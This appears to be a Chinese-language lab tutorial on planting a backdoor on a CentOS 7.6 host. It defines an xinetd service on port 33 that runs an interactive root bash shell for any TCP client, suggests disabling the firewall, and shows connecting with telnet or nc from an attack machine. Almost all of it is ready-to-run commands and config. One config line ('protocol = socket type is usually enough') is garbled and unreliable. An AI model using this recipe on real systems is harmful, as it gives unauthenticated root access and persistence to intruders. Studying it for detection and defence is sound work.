环境
靶机:centos7.6
攻击机:Linux
使用docker搭建靶机环境,当然也可以不使用docker,直接跳过创建容器的步骤即可
创建容器
#创建名为backdoorT4的特权容器,并使用/usr/sbin/init,因为容器默认不开启system服务,所以得使用特权容器开启,不然后续无法使用systemctl命令
docker run -itd --name backdoorT4 --privileged=true centos:7.6.1810 /usr/sbin/init
# 检查容器创建结果
docker ps -a|grep "backdoorT4"
#进入容器
docker exec -it backdoorT4 /bin/bash
安装xinetd
#在容器内执行:
yum install xinetd -y
#也可以安装firewalld,后续可以使用这个关闭防火墙,或者使用iptables
yum install firewalld -y
修改配置并启动
- 首先需要自定义一个服务并绑定
#自定义一个名为testcn的服务,绑定端口为33,协议tcp,当然你也可以自定义其他名字和端口,切勿与现有的重复
echo "testcn 33/tcp" >> /etc/services
#检查添加结果
cat /etc/services |grep "testcn"
- 修改xinetd配置
#创建配置文件并添加内容
cat > /etc/xinetd.d/testcn << EOF #根据自己定义的服务名相应的修改文件名
{
disable = no #开启
id = testcn-stream
wait = no
socket_type = stream #使用tcp,如果使用udp,修改成dgram
protocol = socket type is usually enough
user = root
server = /bin/bash #此属性为执行程序,下一个属性为其参数,合在一起的意思就是/bin/bash -i,提供一个交互式shell
server_args = -i
port = 33 #监听端口,服务绑定的是哪个就填哪个
}
EOF
#启动
systemctl start xinetd
#要使得后门生效一定要让防火墙放开相应得端口,这里的端口号是33。防火墙开放端口的命令太长不记得了,直接关闭防火墙也可以
systemctl status firewalld
#检查xinetd进程和端口33是否启动了
netstat -ltupan|grep xinetd
tcp6 0 0 :::33 :::* LISTEN 5567/xinetd
连接后门
使用攻击机访问靶机的端口。有很多种方法可以连接。一般的,只要支持tcp协议的工具都能连接
#在攻击机上执行
#1.使用telnet连接
telnet 172.17.0.2 33
#连接成功后就可以执行其他命令了
#2.使用nc连接
nc -v 172.17.0.2 33
至此,此后门的使用方法您已经学会了!!!
注:如果操作系统不好安装,可以尝试使用docker安装,方便快捷。